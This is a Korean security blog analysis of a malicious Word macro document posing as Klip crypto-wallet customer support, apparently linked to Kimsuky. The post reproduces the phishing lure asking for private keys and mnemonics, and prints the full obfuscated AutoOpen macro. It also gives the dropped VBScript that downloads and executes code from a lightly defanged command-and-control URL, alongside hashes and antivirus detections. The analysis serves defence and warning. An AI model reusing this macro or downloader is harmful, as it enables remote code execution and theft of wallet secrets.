꿈을꾸는 파랑새

오늘은 카카오 서비스에 만든 카카오톡 암호화폐 지갑 클립(Klip)고객센터를 사칭하는 악성코드인 [Klip 고객센터]오전송_토큰해결_안내(2022.11.24)에 대해 글을 적어 보겠습니다. 해당 카카오가 출시하는 암호화폐 지갑으로 카카오의 블록체인 자회사 그라운드X가 개발했고 클레이를 보관 및 관리할 수 있는 암호화폐 지갑인데 해당 악성코드는 워드 형식으로 된 악성코드이며 클립 고객센터 이름으로 위장을 하고 있으며 실제로는 악성코드 제목은 다음과 같이 [Klip 고객센터]오전송_토큰해결_안내로 돼 있고 doc 확장자를 사용하고 있습니다.
일단 해당 악성코드는 doc 파일로 위장하고 있으며 해당 doc 파일에서는 악성 매크로가 포함돼 있어서 해당 악성코드를 실행하면 문서가 보호되었습니다.
내용을 보시려면 다음 조치들을 검토해주세요.
1.Microsoft Office 응용프로그램을 이용하여 문서를 엽니다.
보호된 문서는 온라인 미리보기를 지원하지 않습니다.
2.데스크톱 또는 랩톱에서 문서를 엽니다.
보호된 문서는 모바일 기기에서 제대로 열리지 않을 수 있습니다.
3.문서 상단에서 "편집사용" 버튼을 누른 후 "콘텐츠 사용"을 눌러 주세요.라고 되어져 있으면 여기서 
보안 경고 매크로 사용 할수 없도록 설정 했습니다.
언제나 똑같은 패턴을 사용하는 것을 볼 수가 있으며 여기서 매크로 허용을 하면 이제 매크로가 동작합니다.

악성 코드 실행
악성코드 실행

콘텐츠 사용 이라고 돼 있는 것을 확인을 할 수가 있습니다. 여기서 해당 콘텐츠 사용을 클릭을 하면 다음과 같이 실제 Klip 고객센터에서 보낸 파일처럼 작성되어 있어 사용자로 하여금 실제 정상파일처럼 헷갈리게 해서 실제 정상 파일처럼 오인하게 합니다.
내용은 다음과 같습니다.

Klip 고객센터]오전송_토큰해결_안내.doc
안녕하세요 고객님, 질문에 대한 답변입니다.
Klip에 많은 관심을 가져주셔서 감사합니다.
현재 Klip은 글로벌 퍼블릭 블록체인 플랫폼 Klaytn 기반의 디지털 자산을 기준으로, 전체 토큰 리스트에 등록된 디지털 자산에 한하여 보관 및 관리가 가능합니다.
토큰 오전송 해결 방법에 대한 절차가 업데이트 정리되어 안내를 드립니다.
절차가 많이 복잡하다고 느껴지시겠지만, 귀하의 디지털 자산 피해를 해결해드리기 위한 절차이니 양해를 부탁드립니다.
귀하가 Klip주소에 해당하는 Ethereum 주소로 토큰을 오전송했고, 귀하의 다른 지갑 주소로 오전송된 토큰을 옮겨주고 지갑을 안전하게 관리하기 위해 Klip에서는 당사의 상기 토큰 관련 암호키에 직접 접근할 기술적/정책적 권한이 아닌 해당 지갑에서 귀하의 다른 지갑에 전송해 드릴 수 있게, 아래와 같은 절차를 통해 귀하가 직접 Klip에 요청하면 Ethereum 네트워크상의 트랜잭션을 발생시켜 보유하신 다른 지갑 주소로 해당 토큰을 전송 할 수 있도록 도와드릴 예정입니다.
그리고 개인정보를 훔치기 위한 개인정보 입력 하는 부분도 있습니다.
고객명: 
2.메일 계정: 
3.전화번호: 
4.지갑명:
5.지갑 주소:
6.개인키 및 니모닉: 
일단 매크로 편집기를 사용해서 열며 프로젝트에 암호가 걸려 있기 때문에 해제해야 합니다.

[소프트웨어 팁/보안 및 분석] - 악성코드 VBA 매크로 비밀번호 푸는 방법

 

악성코드 VBA 매크로 비밀번호 푸는 방법

오늘은 악성코드 VBA 매크로 비밀번호 푸는 방법에 대해 글을 적어 보겠습니다. 해당 글에 관심 있으신 분들은 2가지 분류가 아닐까 생각이 됩니다. 첫 번째는 VBA 에 암호를 걸어 놓았는데 잊어버

wezard4u.tistory.com

이번에는 저번처럼 vbaProject.bin를 찾으면 안 됩니다. 이번에는 해당 vbaProject.bin 대신에 PROJECT를 열어서 강제로 DPB->DPX 로 변경을 해야 합니다.이번에는 조금 변화를 준 것 같습니다.
매크로는 지난 시간에 워드 악성코드 VBA를 푸는 방식은 똑같습니다. [Klip 고객센터]오전송_토큰해결_안내\Macros에 PROJECT 있습니다.
그리고 악성코드 해쉬값은 다음과 같습니다.

Klip 고객센터 위장 악성코드 개인정보 입력 하는곳
Klip 고객센터 위장 악성코드 개인정보 입력 하는곳

파일명:[Klip 고객센터]오전송_토큰해결_안내.doc
사이즈:115 KB
CRC32:d8fea853
MD5:7cf2a5dfb0c0777e0670aea29cb3a97b
SHA-1:ddbcdccf41d8386ae5183415c3ce139a6a010efb
SHA-256:313a743ed5558caa203fd873c22a178d6e4fed8c3ca75d40f827eeedccf31c37
SHA-512:e87fbf56de867d4b895db24dd7c7abb2fedfcf020ed004e636bb5bf4b5b51b8f9a2da534b7077eab822b42f939891c217ca162d4b1334bf3ded7bbc611fbb92c
그리고 해당 파일에는 매크로 코드가 포함돼 있어서 백그라운드에서 악성코드를 실행합니다.
여기서 악성 매크로가 실행되면 다음 경로에. XML 파일이 다운로드가 되고 악성코드가 자동 실행이 되고 C&C 서버에 접속합니다. XML 파일이 다운로드 되는 위치는 다음과 같습니다.
그리고 악성코드는 앞서 다음과 같이 수행을 하게 됩니다.

Klip 고객센터 위장 악성코드 매크로 경로 변경
Klip 고객센터 위장 악성코드 매크로 경로 변경

wscript(.)exe //e:vbscript //b C:\Users\admin\AppData\Roaming\Microsoft\Templates\1589989024(.)xml

그리고 다운로드 되는곳은 다음과 같습니다.
C:\Users\사용자\AppData\Roaming\Microsoft\Templates
1589989024.xml 가 보일것입니다.해당 파일을 열어 보면 다음과 같은 내용을 볼 수가 있습니다.

매크로 실행 후 드롭되는 xml 파일
매크로 실행 후 드롭되는 xml 파일

On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open 
"GET", "http://asenal.medianewsonline(.)com/good/luck/flavor/list.php?query=1",
False:mx.Send:Execute(mx.responseText)

악성코드 매크로
악성코드 매크로

이고 해당 악성코드 매크로는 다음과 같습니다.

Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Function GenPlace()
    Set obTmp = Application.Templates
    Dim tmp As Template
    For Each tmp In obTmp
        If tmp.Type (=) 0 Then
            GenPlace (=) tmp.Path
            Exit For
        End If
    Next
End Function

Sub ResContent(pth, cnt)
    Documents.Add
    With ActiveDocument
        .Range.Text = cnt
        .SaveAs2 FileName:(=)pth, FileFormat:=wdFormatText
        .Close
    End With
End Sub

Sub Weed(ns, pwd)
    Application.ActiveWindow.View.Type (=) wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect pwd
    With wnd.Shapes(ns)
        .Fill.Solid
        .Delete
    End With
End Sub

Sub Perform(wrd)
    Set wm = GetObject("win" (&) "mgm" & "ts" & ":w"( &) "in" & "32_" & "pr" & "oc" & "es" & "s")
    wm.Create wrd
End Sub

Sub Present()
    On Error Resume Next
    Weed "pic", "1qa" & "z2w" & "sx"
    For Mode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = Mode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub AutoOpen()
    On Error Resume Next
    Present
    wnd(.)Save
    cnt (=) "On" & " Er" (&) "ro" & "r " & "Re"( &) "su" & "me " & "Nex" & "t:" & "Set" & " mx" & " =" & " C" (&) "re" & "ate" & "Obj" & "ec" & "t(""" & "Mic" & "ros" & "of" & "t.X" & "ML" & "HT" (&) "TP""" & "):m" & "x." & "op" & "en" & " """ (&) "GET" & """" & ", " & """h" & "ttp" (&) "(://)" & "as" & "en" & "al" (&) ".m" & "edi" & "anew" & "sonl" & "ine" & ".c" (&) "om/" & "go" & "od/" (&) "luc" & "(k/)" & "fl" & "av" & "or/" & "lis" & "t." (&) "ph" & "p?q" & "ue" & "ry=" & "1""" & ", F" & "als" & "e:m" & "x.S" & "end" (&) ":Ex" & "ec" & "ut" & "e(" & "mx" & ".r"( &) "esp" & "on" & "se" & "Tex" & "t)"
    pth (=) GenPlace() & "\1" & "589" (&) "989" & "024" & ".xm" & "l"
    ResContent pth, cnt
    Perform ("wsc" & "rip" & "t." (&) "exe"( &) " //" & "e:v" & "bsc" & "rip" & "t /" & "/b" & " " & pth)
End Sub

입니다.
탈륨(Kimsuky)과 대표적인 위협인 스모크 스크린 캠페인의 연장선이라고 보시면 될 것입니다.
접속하는 사이트 다음과 같습니다.

http://asenal.medianewsonline(.)com/good/luck/flavor/list.php?query=1
http://asenal.medianewsonline(.)com/good/luck/flavor/show.php

그리고 2022-11-22 03:27:38 UTC 기준 바이러스토탈(Virus Total)에서 탐지하는 보안 업체들은 다음과 같습니다.
Acronis (Static ML):Suspicious
Ad-Aware:VBA.Heur.Bomber.1.C263E07F.Gen
AhnLab-V3:Downloader/DOC.Akdoor.S1752
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan[Downloader]/MSOffice.Agent
Arcabit:VBA.Heur.Bomber.1.C263E07F.Gen
Avast:VBS:Obfuscated-gen [Trj]
AVG:VBS:Obfuscated-gen [Trj]
Avira (no cloud):VBS/Drop.Agent.ohyas
BitDefender:VBA.Heur.Bomber.1.C263E07F.Gen
Cynet:Malicious (score: 99)
Cyren:ABRisk.RPCL-0
Elastic:Malicious (high Confidence)
Emsisoft:VBA.Heur.Bomber.1.C263E07F.Gen (B)
eScan:VBA.Heur.Bomber.1.C263E07F.Gen
ESET-NOD32:VBA/TrojanDropper.Agent.BWY
F-Secure:Malware.VBS/Drop.Agent.ohyas
Fortinet:VBA/Agent.BWY!tr
GData:VBA.Heur.Bomber.1.C263E07F.Gen
Google:Detected
Kaspersky:HEUR:Trojan.Script.Generic
Lionic:Trojan.MSWord.Generic.4!c
MAX:Malware (ai Score=87)
McAfee-GW-Edition:BehavesLike.OLE2.Downloader.cb
Microsoft:TrojanDropper:O97M/Donoff.STE!MTB
Rising:Trojan.CodeLoader/VBA!1.DFBF (CLASSIC)
SentinelOne (Static ML):Static AI - Malicious OLE
Symantec:W97M.Downloader
TACHYON:Suspicious/W97M.XSR.Gen
Tencent:Trojan.MsOffice.MacroS.11019191
Trellix (FireEye):VBA.Heur.Bomber.1.C263E07F.Gen
VIPRE:VBA.Heur.Bomber.1.C263E07F.Gen
ViRobot:DOC.Z.Agent.117760.AO
ZoneAlarm by Check Point:HEUR:Trojan.Script.Generic
입니다. 일단 기본적으로 백신 프로그램을 설치해서 실행하는 것이 안전하게 컴퓨터를 사용하는 방법의 하나이며 의심스러운 메일 및 파일을 실행 그리고 대북제재 영향 때문인지 이렇게 가상화폐 관련해서 공격이 계속 되고 있으니 항상 조심하기 바랍니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band